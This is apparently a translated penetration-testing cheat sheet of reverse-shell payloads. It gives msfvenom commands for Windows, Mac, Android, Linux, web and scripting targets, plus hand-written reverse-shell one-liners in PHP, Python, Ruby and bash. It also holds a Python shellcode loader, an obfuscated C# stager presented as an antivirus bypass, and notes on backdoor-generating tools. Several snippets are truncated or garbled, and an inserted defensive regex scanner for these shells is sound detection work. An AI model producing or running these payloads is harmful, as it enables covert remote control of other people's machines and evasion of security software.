0x00 Preface
References:
Micro8 series, lesson 10: https://micro8.gitbook.io/micro8/contents-1/1-10/10msfvenom-chang-yong-sheng-cheng-payload-ming-ling
Micro8 series, lesson 14: https://micro8.gitbook.io/micro8/contents-1/11-20/14-ji-yu-di-shi-ke-bu-chong-payload1
Micro8 series, lesson 15: https://micro8.gitbook.io/micro8/contents-1/11-20/15-ji-yu-di-shi-ke-bu-chong-payload2
msfvenom command-line options
Description of the msfvenom options:

Options:
    -p, --payload <payload>       Use the specified payload
    --payload-options             List the options of that payload
    -l, --list [type]             List all payloads (or all modules of the given type)
    -n, --nopsled <length>        Prepend a nopsled of the given length to the payload
    -f, --format <format>         Output format of the generated payload (--help-formats lists all supported formats)
    -e, --encoder <encoder>       Use the specified encoder
    -a, --arch <arch>             Architecture of the payload
    --platform <platform>         Platform of the payload (--help-platforms lists all supported platforms)
    -s, --space <length>          Maximum size of the resulting payload
    --encoder-space <length>      The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars <list>        Characters to avoid, e.g. '\x00\xff'
    -i, --iterations <count>      Number of encoding iterations
    -c, --add-code <path>         Specify an additional win32 shellcode file to include
    -x, --template <path>         Specify an executable file to use as a template
    -k, --keep                    Keep the template's behaviour; the payload is split off and injected into a new process
    -o, --out <path>              Save the generated payload to this file
    -v, --var-name <name>         Specify a custom variable name
    --smallest                    Generate the smallest possible payload
    -h, --help                    Show the help text
0x01 Windows
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe
0x02 Mac
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f macho -o payload.macho
0x03 Android
// needs to be signed
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f apk -o payload.apk
0x04 PowerShell
msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
0x05 Linux
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f elf -o payload.elf
0x06 PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
Below are some additional payloads used for bypass purposes.
Start the listener:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
payload1 (this one is incomplete):
<?php
error_reporting(0);
$ip = 'x.x.x.x';
$port = 53;
if (($f = 'stream_socket_client') && is_callable($f)) { {$port}"); $s_type = 'stream'; }
if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_ strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } }
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
if (extension_loaded('s >
payload2:
<?php $sock=fsockopen("xx.xx.xx.xx",xx);exec("/bin/sh -i <&3 >&3 2>&3"); ?>
0x07 ASPX
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f aspx -o payload.aspx
0x08 JSP
msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.jsp
0x09 WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.war
0x0A NodeJS
msfvenom -p nodejs/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.js
0x0B Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.py
Below are some additional payloads used for bypass purposes.
Start the listener:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
payload1:
import socket,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('x.x.x.x',xx))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})
payload2 (this one is incomplete):
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xx.xx.xx.xx",xx)); i"]);
payload3:
import socket
import subprocess
s=socket.socket()
s.connect(("xx.xx.xx.xx",xx))
while 1:
    p = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.send(p.stdout.read() + p.stderr.read())
Strip the signature:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.8.8.8 LPORT=88 -f c | tr -d '"' | tr -d '\n'
Then place the payload produced by the command above into the Python payload:
from ctypes import *
reverse_shell = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72
micropoorshell = create_string_buffer(reverse_shell, len(reverse_shell))
shellcode = cast(micropoorshell, CFUNCTYPE(c_void_p))
shellcode()
0x0C Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.pl
0x0D Ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.rb
Below are some additional payloads used for bypass purposes.
payload1:
require 'socket';c=TCPSocket.new("xx.xx.xx.xx", x);$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdi(IO.popen(l,"rb"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }
payload2:
require 'socket';f=TCPSocket.open("xx.xx.xx.xx",xx).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)
payload3:
require 'socket';c=TCPSocket.new("xx.xx.xx.xx","xx");while (cmd=c.gets);IO.popen(cmd,"r"){|io| c.print io.read}end
payload4:
c=TCPSocket.new("xx.xx.xx.xx","xx");while (cmd=c.gets);IO.popen(cmd,"r"){|io| c.print io.read}end
0x0E Lua
msfvenom -p cmd/unix/reverse_lua LHOST=<attacker IP> LPORT=<attacker port> -f raw -o payload.lua
0x0F Windows Shellcode
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c
0x10 Linux Shellcode
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c
0x11 Mac Shellcode
msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f c
0x12 Bash
msfvenom -p cmd/unix/reverse_bash LHOST=xx.xx.xx.xx LPORT=xx -f raw > payload.sh
payload1:
i >& /dev/tcp/xx.xx.xx.xx/xx 0>&1
payload2:
exec 5<>/dev/tcp/xx.xx.xx.xx/xx
cat <&5 | while read line; do $line 2>&5 >&5; done
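The one-liners in the PHP, Python, Ruby and bash sections above share one shape: a network connect/open primitive followed by a command-execution primitive (bash needs only the /dev/tcp pseudo-device plus redirection). The scanner below, an added example that is not part of the original post, encodes each family as a rule and runs it over constructed sample texts (the first four are the post's own snippets with their placeholders kept, the rest are benign look-alikes). It is the kind of check a defender runs over uploaded web files, cron entries, shell history or command-line audit logs; the rule names and samples are this example's own.

```python
"""Added example (not part of the original post): a pattern scanner for the
reverse-shell one-liner families listed above (PHP fsockopen + exec, Python
socket + exec/subprocess, Ruby TCPSocket + exec/IO.popen, bash /dev/tcp).
All sample inputs are constructed for this demo or copied from the post."""
import re

# One rule per family: a network connect/open primitive followed, anywhere later in
# the same text, by a command-execution primitive. re.S lets the lazy ".*?" span lines.
RULES = [
    ("php_fsockopen_exec",
     re.compile(r"fsockopen\s*\(.*?\)\s*;.*?\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.S)),
    ("python_socket_exec",
     re.compile(r"socket\.socket\s*\(.*?\.connect\s*\(.*?\b(exec|subprocess|os\.dup2|pty\.spawn)\b", re.S)),
    ("ruby_tcpsocket_exec",
     re.compile(r"TCPSocket\.(?:new|open)\s*\(.*?\b(exec|IO\.popen|spawn|system)\b", re.S)),
    # bash needs no exec primitive: the /dev/tcp pseudo-device plus redirection is the tell.
    ("bash_dev_tcp",
     re.compile(r"/dev/tcp/[\w.:\-]+/\w+")),
]


def scan(text):
    """Return the names of every rule family that matches `text` (empty list = clean)."""
    return [name for name, rx in RULES if rx.search(text)]


def flagged(texts):
    """Indices of the inputs that matched at least one rule."""
    return [i for i, t in enumerate(texts) if scan(t)]


# Constructed samples. The first four are the post's own snippets (placeholders kept);
# the last three are benign look-alikes that must not fire.
SAMPLES = [
    '<?php $sock=fsockopen("xx.xx.xx.xx",xx);exec("/bin/sh -i <&3 >&3 2>&3"); ?>',
    """import socket,struct,time
for x in range(10):
    try:
        s=socket.socket(2,socket.SOCK_STREAM)
        s.connect(('x.x.x.x',xx))
        break
    except:
        time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
    d+=s.recv(l-len(d))
exec(d,{'s':s})""",
    """require 'socket';f=TCPSocket.open("xx.xx.xx.xx",xx).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)""",
    "exec 5<>/dev/tcp/xx.xx.xx.xx/xx",
    '<?php echo htmlspecialchars($_GET["name"]); ?>',
    'import socket\ns = socket.socket()\ns.connect(("example.org", 80))\ns.sendall(b"GET / HTTP/1.0\\r\\n\\r\\n")',
    "tcpdump -i eth0 port 4444",
]

if __name__ == "__main__":
    for i in flagged(SAMPLES):
        print(i, scan(SAMPLES[i]))
```

The rules are deliberately structural (connect primitive, then execution primitive) rather than keyed to the exact strings in the post, so trivial renaming of variables or reordering of arguments does not evade them; they are still regexes, so treat hits as triage leads, not verdicts.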
0x13 C#
Start the listener:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.107
LHOST => 192.168.1.107
Obfuscated payload:
using System;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.
namespace RkfCHtll {
    class LiNGeDokqnEH {
        static byte[] idCWVw(string VVUUJUQytjlL, int eMcukOUqFuHbUv) {
            IPEndPoint nlttgWAMdEQgAo = new IPEndPoint(IPAddress.Parse(VVUUJUQytjlL), eMcukOUqFuHbUv);
            Socket fzTiwdk = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            try { fzTiwdk.Connect(nlttgWAMdEQgAo);} catch { return null;}
            byte[] gJVVagJmu = new byte[4];
            fzTiwdk.Receive(gJVVagJmu, 4, 0);
            int GFxHorfhzft = BitConverter.ToInt32(gJVVagJmu, 0);
            byte[] mwxyRsYNn = new byte[GFxHorfhzft + 5];
            int yVcZAEmXaMszAc = 0;
            while (yVcZAEmXaMszAc < GFxHorfhzft) { yVcZAEmXaMszAc += fzTiwdk.Receive(mwxyRsYNn,yVcZAEmXaMszAc + 5, (GFxHorfhzft - yVcZAEmXaMszAc) < 4096
            byte[] XEvFDc = BitConverter.GetBytes((int)fzTiwdk.Handle);
            Array.Copy(XEvFDc, 0, mwxyRsYNn, 1, 4);
            mwxyRsYNn[0] = 0xBF;
            return mwxyRsYNn;}
        static void hcvPkmyIZ(byte[] fPnfqu) {
            if (fPnfqu != null) {
                UInt32 hcoGPUltNcjK = VirtualAlloc(0,(UInt32)fPnfqu.Length, 0x1000, 0x40);
                Marshal.Copy(fPnfqu, 0, (IntPtr)(hcoGPUltNcjK), fPnfqu.Length);
                IntPtr xOxEPnqW = IntPtr.Zero;
                UInt32 ooiiZLMzO = 0;
                IntPtr wxPyud = IntPtr.Zero;
                xOxEPnqW = CreateThread(0, 0, hcoGPUltNcjK, wxPyud, 0, ref ooiiZLMzO);
                WaitForSingleObject(xOxEPnqW, 0xFFFFFFFF);
            }}
        static void Main(){
            byte[] dCwAid = null;
            dCwAid = idCWVw("xx.xx.xx.xx", xx);
            hcvPkmyIZ(dCwAid);
        }
        [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 qWBbOS,UInt32 HoKzSHMU, UInt
        [DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 tqUXybrozZ, UInt32 FMmVpwin, UInt32 H
        [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr CApwDwK, UInt32 uzGJUddCYTd);
0x14 Related payload generation tools
TheFatRat
Project: https://github.com/Screetsec/TheFatRat
TheFatRat is an exploitation tool that uses a variety of payloads to compile malware that runs on Linux, Windows, Mac and Android. It offers an easy way to create backdoors and effective payloads that can bypass most antivirus software.
TheFatRat has the following features:
Fully automated use of msfvenom and Metasploit;
Generates local or remote listeners;
Easily creates operating-system backdoors by type;
Generates payloads in a variety of formats;
Antivirus-bypassing backdoors;
A file pumper that can be used to increase file size;
Detects the external IP and interface addresses;
Automatically creates AutoRun files for USB/CD-ROM exploitation;
Download and install:
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat-master/
chmod +x setup.sh
./setup.sh
MSFvenom Payload Creator (MSFPC)
Project: https://github.com/g0tmi1k/mpc
MSFPC is a tool that simplifies the use of msfvenom's many options. It is essentially a shell script built on top of msfvenom that quickly generates Meterpreter payloads of various types.